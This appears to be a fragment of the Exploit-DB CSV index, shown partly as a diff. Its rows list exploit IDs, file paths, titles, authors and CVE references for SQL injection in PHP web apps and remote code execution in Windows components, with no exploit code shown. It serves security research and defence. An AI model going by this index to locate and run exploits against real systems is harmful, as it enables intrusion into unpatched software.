52314,exploits/php/webapps/52314.txt,"CloudClassroom PHP Project 1.0 - SQL Injection",2025-06-05,"Sanjay Singh",webapps,php,,2025-06-05,2025-06-05,0,CVE-2025-45542,,,,,
19549,exploits/php/webapps/19549.txt,"CLscript Classified Script 3.0 - SQL Injection",2012-07-03,"Daniel Godoy",webapps,php,,2012-07-03,2012-07-03,0,OSVDB-83690,,,,,
19600,exploits/php/webapps/19600.txt,"CLscript CMS 3.0 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,webapps,php,,2012-07-05,2012-07-05,0,OSVDB-84678;OSVDB-84677;OSVDB-84676;OSVDB-84675;OSVDB-84674;OSVDB-84673,,,,,https://www.vulnerability-lab.com/get_content.php?id=574
12423,exploits/php/webapps/12423.txt,"CLScript.com Classifieds Software - SQL Injection",2010-04-27,41.w4r10,webapps,php,,2010-04-26,,1,OSVDB-64098;CVE-2010-1660,,,,,
@ -44745,6 +44750,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
2355,exploits/windows/remote/2355.pm,"Microsoft Windows Server 2003 - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)",2006-09-13,"Trirat Puttaraksa",remote,windows,445,2006-09-12,,1,OSVDB-27845;CVE-2006-3439;MS06-040,"Metasploit Framework (MSF)",,,,
47558,exploits/windows/remote/47558.py,"Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution (MS15-011)",2019-10-29,"Thomas Zuk",remote,windows,,2019-10-29,2020-12-11,0,CVE-2015-0008,,,,,
47559,exploits/windows/remote/47559.py,"Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass (MS15-014)",2019-10-29,"Thomas Zuk",remote,windows,,2019-10-29,2020-12-11,0,CVE-2015-0009,,,,,
52315,exploits/windows/remote/52315.py,"Microsoft Windows Server 2025 JScript Engine - Remote Code Execution (RCE)",2025-06-05,"Mohammed Idrees Banyamer",remote,windows,,2025-06-05,2025-06-05,0,CVE-2025-30397,,,,,
28482,exploits/windows/remote/28482.rb,"Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071) (Metasploit)",2013-09-23,Metasploit,remote,windows,,2013-09-23,2013-09-23,1,CVE-2013-0810;OSVDB-97136;MS13-071,"Metasploit Framework (MSF)",,,,
46220,exploits/windows/remote/46220.txt,"Microsoft Windows VCF or Contact' File - URL Manipulation-Spoof Arbitrary Code Execution",2019-01-22,"Eduardo Braun Prado",remote,windows,,2019-01-22,2019-01-22,0,,,,,,
34931,exploits/windows/remote/34931.c,"Microsoft Windows Vista - 'lpksetup.exe oci.dll' DLL Loading Arbitrary Code Execution",2010-10-25,"Tyler Borland",remote,windows,,2010-10-25,2014-10-10,1,,,,,,https://www.securityfocus.com/bid/44414/info

Can't render this file because it is too large.